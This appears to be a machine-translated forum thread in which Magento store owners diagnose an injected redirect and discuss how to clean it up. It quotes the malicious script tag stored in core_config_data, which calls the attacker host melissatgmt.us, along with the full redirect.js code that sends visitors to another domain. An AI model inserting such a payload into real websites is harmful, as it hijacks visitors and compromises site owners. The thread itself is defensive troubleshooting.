웹 사이트가 다른 URL로 리디렉션 시작

Maybe it's infected by some virus.

내 웹 사이트가 감염된 URL로 리디렉션을 시작합니다.

http://mon.setsu.xyz
및 시간 https://tiphainemollard.us/index/?1371499155545
감염된 링크

내가 해결 한 것.

1. 주석이 달린 .htaccess 파일 (아무것도 일어나지 않습니다)
2. 주석 포함 폴더 (아무 일도 없음)
3. 스캔 완료된 서버 (바이러스 맬웨어가 발견되지 않음)
4. PHP 나 날씨에 영향을 미치지 않도록 데이터베이스에서 CSS, 미디어 및 js 경로를 변경했습니다.
5. select * from core_config_data where path like '%secure%';모든 링크는 괜찮지 UPDATE

나는 구글에 많은 기사를 작성했지만 브라우저 문제이거나 내 시스템이 감염되었다고 제안합니다. 휴대 전화 나 개인 랩톱에서 사이트를 열더라도 이에 대한 기사 는 동일합니다.

업데이트 2

영향을받는 데이터베이스에서 행을 찾았습니다. (보리스 케이도 말했듯이)

에서 core_config_data 테이블 design/head/includes 값이이

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>  

페이지로드시 헤드 섹션에 삽입됩니다.

위의 URL을 방문하면 리디렉션 스크립트가 표시됩니다.

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

스크립트를 제거하면 고객 웹 사이트가 오후부터 작동합니다. But the main problem is how that script inserted into the database.

하나의 패치도 구식이므로 패치도 업데이트했습니다.

업데이트 3 사이트가 다시 감염되었습니다. 이것은 관리 섹션에 삽입 된 스크립트입니다 ( 관리-> 구성-> 일반-> 디자인-> HTML 헤드-> 기타 스크립트 )

그리고 데이터베이스 열에서

지금 무엇을해야할지 모르겠습니다. 모든 비밀번호를 변경함에 따라 기존 사용자를 모두 삭제했습니다.

업데이트 3

지금까지는 오류가 발생하지 않으므로 위의 단계를 수행하면이 문제를 극복 할 수 있습니다.

업데이트 : : 4 항상 패치를 설치하면 프로젝트에서 이러한 유형의 문제가 덜 발생하기 쉽고 패치도 중요합니다. https://magescan.com/ 을 사용 하여 웹 사이트에서 문제를 확인할 수 있습니다 .

core_config_data아래 의 표 에서 삽입 된 코드를 찾았습니다 design/head/includes. 그것을 제거하고 이제 사이트가 정상으로 돌아 왔습니다.

업데이트 : 다른 사람들이 언급했듯이 오늘 아침에 다시 발생했습니다. 이번에는의 관리자 패널에서 더 쉽게 제거했습니다 System > Configuration > General > Design > HTML Head > Miscellaneous Scripts. 이것은 큰 취약점이므로 Magento가 패치 작업을하고 있기를 바랍니다.

업데이트 2 : 스크립트가 다시 돌아 왔으므로 db 암호를 변경하고 캐시를 지 웠습니다. 약 한 시간 후에 스크립트가 다시 나타납니다. 그래서 나는 그것이 db를 통해 추가되고 있다고 생각하지 않습니다. 방금 관리자 비밀번호를 변경했습니다. 다시 비밀번호가 표시되는지 확인해 보겠습니다.

업데이트 3 : 영향을받는 두 사이트에서 어제 관리자 암호를 변경 했으므로 약 24 시간 후에도 여전히 깨끗합니다.

다른 마 젠토 사이트에서도 마찬가지입니다. 페이지의 HEAD 섹션에 스크립트가 삽입되어 melissatgmt.us에서 redirect_base / redirect.js를 요청한 다음 다른 도메인으로 변경되었지만이 똥이 어떻게 주입되는지 알 수 없습니다.

업데이트 : 다른 사람들이 언급했듯이 core_config_data 테이블에서 항목을 찾아서 제거했지만 레코드는 다음 페이지 다시로드시 돌아 왔습니다. db 암호를 변경했는데 지금은 패배 한 것 같습니다. 암호 변경이 궁극적 인 솔루션인지 확실하지 않지만 보안 향상입니다.

업데이트 2 : Jix Sas가 언급했듯이 magento 관리의 구성에서 액세스하는 것이 데이터베이스 테이블에 직접 액세스하는 것보다 쉬운 솔루션입니다. 그러나 똥은 10/15 분마다 계속 돌아옵니다.

업데이트 3 : 관리자 암호를 변경하고 어떻게 든 감염되었거나 캐시를 비활성화하고 캐시를 여러 번 치료 한 것처럼 보이는 일부 cms 페이지 (고객 서비스 및 약 -us)를 확인 및 저장했습니다 ( '감염된'cms 페이지의 모든 확인 및 저장 후) 아니오 지난 8 시간 동안 더 많은 스크립트가 주입되었습니다.

관리자 패널의 경로를 변경하면 app/etc/local.xml도움이됩니다. 스크립트가 더 이상에 추가되지 않습니다 design/head/includes.

설명 :

에서 app/etc/local.xml내가 변경 <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>이전에는이었다 sitedomain.com/admin, 지금은 관리자 패널로 경로가 될 것입니다 sitedomain.com/new_admin_path

이것은 큰 구호입니다, 나는 아침부터 내 사이트를 10 번 복원했습니다.

버그는 계속해서오고 있습니다.

궁극적 인 해결책은 무엇입니까?

DB 비밀번호를 변경 하시겠습니까? 루트 비밀번호를 변경 하시겠습니까? 패치가 출시 되었습니까?

이 문제가 확실하지 않은 경우 보안 컨설팅에서 보낸 이메일 아래에 있습니다.

친애하는 각하 또는 부인

우리는 스위스, 폴란드 및 네덜란드에 본사를 둔 마 젠토 개발 회사 Hatimeria입니다.

최근에 새 클라이언트와 작업을 시작하여 이전 서버를 인수했습니다. 우리가 서버에 액세스하는 순간 우리는 해커가 클라이언트의 서버를 인계하여 다른 웹 사이트를 해킹하는“해커 컴퓨터”로 사용할 수있는 일부 맬웨어를 발견했습니다. 물론 클라이언트는 이것이 자신의 서버에서 발생하고 있음을 알지 못했습니다.

해당 서버를 통해 해킹 된 웹 사이트의 데이터베이스 자격 증명을 찾았습니다. 물론 우리는 그것으로 아무것도하지 않을 것이지만, 나는 당신에게 연락하고 무슨 일이 일어나고 있는지 알려 주어야 할 의무가 있습니다. 해킹은 Magento Cacheleak 취약점을 통해 이루어졌으며, 이는 현재 상점에 여전히 존재할 수 있습니다.

해당 취약점을 즉시 처리하고 데이터베이스 암호를 변경하는 것이 좋습니다. 우리의 기술자들은 약 30 분이 걸린다고 말합니다.

웹 사이트 MageReport에서 귀하의 웹 사이트가 https://www.magereport.com/scan/?s=에 취약한 다른 것을 확인할 수 있습니다.

이 이메일의 주된 목적은 고객 확보를위한 것이 아니라 상점 보안에 대한 도움이 필요하거나 다른 질문이있는 경우 기꺼이 도와 드리겠습니다.

친절한면에서 토마스 태너

그래서 해결책은 DB 비밀번호 변경이라고 생각합니다.

이러한 스팸 주입의 주요 원인을 이해해야합니다.

사이트가 주입 된 경우, 모든 세 가지 맬웨어 검사에서 사이트를 확인하십시오.

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

보안 패치가 누락 되었기 때문입니다. 패치가 누락 된 경우이 주제 아래에보고 하십시오 .

1. 호스팅 액세스 비밀번호 변경 데이터베이스 비밀번호 변경 관리자 로그인 비밀번호 변경 URL을 숨기고 다운로드하고 공개보기에서 / RSS /를 숨 깁니다.

2. 전체 사이트 바이러스 검사를 수행하면 호스팅 제공 업체가 직접 사이트를 검사 할 수없는 경우 해당 사이트를 검사 할 수 있습니다.

3. Sysytem-> 사용자로 이동하여 계정에 인증되지 않은 등록 된 사용자가 있는지 확인하십시오.

문제를 해결했습니다. 이후에도 나는에서 fhis 파일을 삭제 <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>로부터 core_config_data테이블 design/head/includes값. 문제가 해결되지 않았습니다. 스크립트 코드가 반복해서 삽입되었습니다. 문제를 해결하려면 다음 세 단계를 따르십시오.

1. 의 core_config_data표에서 스크립트 코드를 삭제하십시오 design/head/includes.
2. app/etc/local.xml신임 정보를 포함하여 데이터베이스 비밀번호를 변경하십시오 .
3. 이 명령을 사용하여 루트 Magento 폴더에서 캐시 지우기 rm -rf var/cache/*

ps 나는 하루 종일 보냈다. 바라건대, 이것은 당신을 위해 일할 것입니다. 그리고 파일을 항상 백업하십시오.

이 정확히 같은 일이 오늘 나에게 일어났다! 동일한 웹 사이트로 리디렉션합니다. 그러나 Magento 관리자 패널의 구성> 디자인> html 헤드> misc 스크립트에서 스크립트를 찾았습니다. 이 스크립트가 있었다 : <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> 나는 거기에서 그것을 제거하고 웹 사이트는 잘 작동합니다. 스크립트를 찾은 폴더가 없습니다. 스크립트가 어디에 있는지 알 수 있습니까? (HTML head> misc 스크립트의 경로를 알고 있음)

또한 최근에 무엇을 했습니까? 아마도 원인을 알아낼 수 있을까요? 나를 위해, 나는 원인 일 수있는 무료 뉴스 레터 팝업을 설치했습니다. 당신은 어때요?

업데이트 : 이제 스크립트가 돌아 왔습니다. 누군가 데이터베이스 에서이 스크립트에 액세스하여 제거하려면 어떻게해야합니까?

업데이트 2 : Mark가 언급했듯이 스크립트를 제거하고 데이터베이스 비밀번호를 변경하면이 스크립트가 다시 나타나지 않습니다. 이 취약점의 이름을 아는 사람이 있거나 고객 지불에 위험이있는 경우 알려주십시오.